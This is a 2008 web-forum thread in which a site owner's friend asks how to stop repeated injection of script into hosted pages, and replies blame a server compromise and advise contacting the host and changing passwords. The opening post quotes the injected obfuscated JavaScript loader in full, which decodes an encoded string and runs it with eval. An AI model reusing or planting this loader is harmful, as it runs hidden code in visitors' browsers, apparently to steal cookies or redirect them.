Getting hacks everyday

**allahverdi** · 06-18-2008, 08:08 AM

One of my friend's site getting hacks everyday. Someone adds this:

<script language=JavaScript>function jban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,43,42,27,7,60,12,11,20,14,0,0,0,0,0,0,59,18,48,30,44,0,51,50,21,53,22,37,38,40,2,1,39,45,47,9,36,6,33,10,54,16,17 ,0,0,0,0,61,0,62,13,49,24,3,26,25,56,55,58,29,35,52,4,23,31,5,19,34,15,46,41,8,28,32,57);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(179^w&255);w>>=8;s-=2}else{s=6}}}eval(r);}}jban('n1kioFbckN5cApDcE@wKiFkiJrSsoFbmU@QIkpxPn4DX43_L8aMXH4DmC3_Tk7QiJ@dVEAdVrNxBY@dT3p5cePwPxNhBfrbBk2kiHFbP4FSl8sv0Ap5XkU6iUi_I3jRm4R kPO7kioFQi32gLNfhVn9MLdAgVEAdV8sSKZ9Scfp_c3@dyOWhT33QX8R_c9AhyrN5cW0QI9UzIfe5Bp7QGSXbik3kTbawPfokBA@QIbAvL')</script>

How to defend??

**djr33** · 06-18-2008, 08:16 AM

Does make any difference what is being done once hacked-- what matters is how his site is being accessed. Can't really help you there without more information.

**allahverdi** · 06-18-2008, 08:29 AM

This is his site.

Antivirus detected virus.

Same things in all sites in one hosting.

**ddadmin** · 06-18-2008, 05:24 PM

Get your friend to contact his host asap about the breach. This isn't a JavaScript issue per say, but a server compromise that has allowed the hacker to inject arbitrary HTML onto his site pages. In this case, the HTML is in itself a vicious JavaScript code probably meant to steal cookie information or redirect users to another site, but it could easily have been just an offensive image instead. The point is, your friend's server has been compromised, and can only be fixed by someone with access to the server.

**boogyman** · 06-18-2008, 05:45 PM

what ddadmin said is probably correct, however this could also be a password issue?

did your friend change his "cpanel" and/or ftp password? if yes and this is still happening, then it is the server itself that's being breached and not just his account

**allahverdi** · 06-19-2008, 03:58 AM

Originally Posted by boogyman

what ddadmin said is probably correct, however this could also be a password issue?

did your friend change his "cpanel" and/or ftp password? if yes and this is still happening, then it is the server itself that's being breached and not just his account

Yes he changed.

And other accounts got same too...

Thanks ddadmin

**hmsnacker123** · 06-20-2008, 12:10 AM

omg, i had my scanner turned off and i foolishly went on the link, is my pc infected????

Thread: Getting hacks everyday

Thread Tools

Search Thread

Getting hacks everyday

The Following User Says Thank You to ddadmin For This Useful Post:

Bookmarks

Bookmarks

Posting Permissions